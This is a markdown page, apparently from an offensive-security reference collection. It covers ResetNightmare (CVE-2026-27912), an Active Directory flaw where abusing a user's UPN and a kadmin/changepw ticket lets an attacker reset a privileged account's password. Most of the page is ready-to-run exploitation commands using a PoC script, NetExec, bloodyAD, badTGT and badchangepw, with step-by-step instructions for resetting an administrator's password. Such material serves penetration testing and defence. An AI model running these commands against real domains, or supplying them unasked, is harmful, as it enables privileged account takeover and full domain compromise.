resetnightmare.md (3670B)
1 --- 2 title: "ResetNightmare" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/CVE/ResetNightmare.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/ResetNightmare.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # ResetNightmare 12 13 > CVE-2026-27912 14 15 * [Semperis-Community/ResetNightmare](https://github.com/Semperis-Community/ResetNightmare) - POC tool for ResetNightmare (CVE-2026-27912) 16 17 ```ps1 18 . .\ResetNightmare.ps1 19 20 Invoke-ResetNightmare ` 21 -TargetAccount "victim" ` 22 -TargetNewPassword "NewP@ssw0rd!" ` 23 -UPNUser "controlledUser" ` 24 -UPNUserPassword "ControlledP@ss!" 25 ``` 26 27 * [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec) - resetnightmare module 28 29 ```ps1 30 nxc ldap 10.10.10.10 -u user -p password -M resetnightmare -o TARGET='administrator' NEW_PASSWORD='P@ssw0rd' UPN_USER='nxc$' UPN_PASSWORD='Password123!' 31 ``` 32 33 **Exploitation**: 34 35 1. An attacker has obtained a user named **UPNUser**, with no special permissions other than the ability to modify their own UPN value. 36 2. The attacker sets the user's UPN to the `SamAccountName` of the targeted account; for example, **DemoAdmin1**. This action does not require bypassing UPN uniqueness verification checks. **DemoAdmin1**'s actual UPN should be **<DemoAdmin1@demo.lab>**, so setting **UPNUser**'s UPN to just **DemoAdmin1** is allowed. 37 38 ```ps1 39 bloodyAD -H 10.10.10.10 -d domain.lab -u Attacker -p 'Password123!' get object 'DemoAdmin1' --attr sAMAccountName 40 bloodyAD -H 10.10.10.10 -d domain.lab -u Attacker -p 'Password123!' set object UPNUser userPrincipalName -v DemoAdmin1 41 ``` 42 43 3. The attacker requests a TGT for `kadmin/changepw` by specifying **DemoAdmin1** as the user name, `NT-ENTERPRISE` as the name type, and **UPNUser**'s password. 44 45 ```ps1 46 badTGT 'kerberos+pw://domain.lab\DemoAdmin1:Password123!@10.10.10.10/?ptype=10' --ccache UPNUser.ccache --sname kadmin/changepw 47 ``` 48 49 4. The DC returns a `TGT_REP` with a TGT for **UPNUser** (as indicated by `PAC_REQUESTOR_SID` in the PAC), but with the username **DemoAdmin1**(NT_ENTERPRISE). 50 51 5. Using this ticket to issue a password change request will reset **UPNUser**'s password. To escalate privileges, the attacker changes or clears **UPNUser**'s UPN value, leaving no user with the UPN appearing on the ticket. 52 53 ```ps1 54 bloodyAD -H 10.10.10.10 -d domain.lab -u Attacker -p 'Password123!' set object UPNUser userPrincipalName -v UPNUser 55 badchangepw 'kerberos+ccache://domain.lab\DemoAdmin1:UPNUser.ccache@10.10.10.10' 'newAdminPwd1!' 56 ``` 57 58 6. Trying to use this ticket for a `TGS_REQ` after the UPN change will result in a `KDC_ERR_TGT_REVOKED` error, due to the `PAC_REQUESTOR_SID` patch, blocking impersonation. However, by using this ticket to construct the password change request, the password change works. 59 60 7. Now, the attacker can request a new TGT for **DemoAdmin1**, without specifying the `NT-ENTERPRISE` name type. The request now works and the name type of the ticket is `NT-PRINCIPAL`, indicating that the ticket belongs to the real (SamAccountName) **DemoAdmin1** user. 61 62 ## References 63 64 * [Exploiting AD ResetNightmare (CVE-2026-27912) and KerberLoss (CVE-2026-25177) from Linux - Baptiste Crépin - August 10, 2026](https://cravaterouge.com/articles/resetnightmare/) 65 * [Identity Crisis: Novel Vulnerabilities Leading to Kerberos Downgrade, DoS, and Full Domain Takeover - Shai Laron - August 05, 2026](https://www.semperis.com/blog/identity-crisis-novel-vulnerabilities-leading-to-kerberos-downgrade-dos-and-full-domain-takeover/)